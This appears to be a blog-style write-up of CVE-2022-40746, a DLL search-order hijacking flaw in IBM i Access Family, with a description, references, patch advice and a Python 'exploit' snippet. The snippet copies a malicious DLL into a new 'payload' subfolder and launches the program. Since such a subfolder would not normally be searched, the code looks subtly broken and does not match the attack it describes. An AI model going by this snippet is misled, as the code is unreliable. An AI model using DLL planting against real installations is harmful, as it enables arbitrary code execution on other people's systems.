CVE-2022-40746 - Execution of Arbitrary Code on IBM i Access Family due to DLL Search Order Hijacking Vulnerability

A critical vulnerability, CVE-2022-40746, has been discovered in IBM i Access Family that affects various versions ranging from 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.. This vulnerability allows a local authenticated attacker to execute arbitrary code on the system. The security issue arises from a DLL search order hijacking vulnerability. By exploiting this vulnerability, an attacker can place a specially crafted file in a compromised folder, leading to the execution of arbitrary code on the system. IBM X-Force has assigned this vulnerability an ID of 236581.

Exploit Details

The issue at hand is a result of improper handling of DLL search order by IBM i Access Family. When the software looks for a DLL (Dynamic Link Library) file required for its execution, it searches in a specific sequence for that file. If an attacker can manipulate this search order, they have the ability to prioritize their malicious DLL over the legitimate one, hence leading to the execution of the rogue code.

To exploit this vulnerability, the attacker must first have local access to a system with a vulnerable version of IBM i Access Family. With this access, the attacker can place a malicious DLL file in a folder searched by the software before it reaches the legitimate DLL file. When the application runs, it will inadvertently execute the attacker's code, granting them arbitrary code execution privileges.

Code Snippet

import os
import shutil

# Prepare payload: replace with path to your malicious DLL
payload_path = "path/to/malicious/dll"

# Locate vulnerable IBM i Access Family installation
install_path = "path_to_install_folder"

# Check if the payload directory exists, if not, proceed to exploit
if not os.path.exists(os.path.join(install_path, "payload")):
    # Create payload directory
    os.makedirs(os.path.join(install_path, "payload"))

    # Copy the malicious DLL to the payload directory
    shutil.copy(payload_path, os.path.join(install_path, "payload"))

    # Launch IBM i Access Family (assuming vulnerable DLL search order)
    os.system(os.path.join(install_path, "ibmiaccess.exe"))

    print("Exploit executed.")
else:
    print("Payload directory already exists. Aborting.")

Original References

IBM Security Bulletin: https://www.ibm.com/support/pages/node/6528188
CVE Details Page: https://nvd.nist.gov/vuln/detail/CVE-2022-40746
IBM X-Force ID 236581: https://exchange.xforce.ibmcloud.com/vulnerabilities/236581

Mitigation and Recommendations

IBM has addressed this vulnerability in IBM i Access Family versions 1.1.9.1 and later. Users who are running affected versions should update their software as soon as possible to protect their systems. Additionally, users can restrict access to the affected systems, only allowing trusted users to interact with them.

Conclusion

CVE-2022-40746 is a critical vulnerability in IBM i Access Family that allows arbitrary code execution when exploited by a local authenticated attacker. To mitigate this risk, users should update their software to the latest version, apply proper access controls, and remain vigilant for signs of suspicious activity. By staying up-to-date with security patches and maintaining a strong security posture, users can help protect their systems and data from this and other potential threats.

Timeline

Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/23/2022 17:21:00 UTC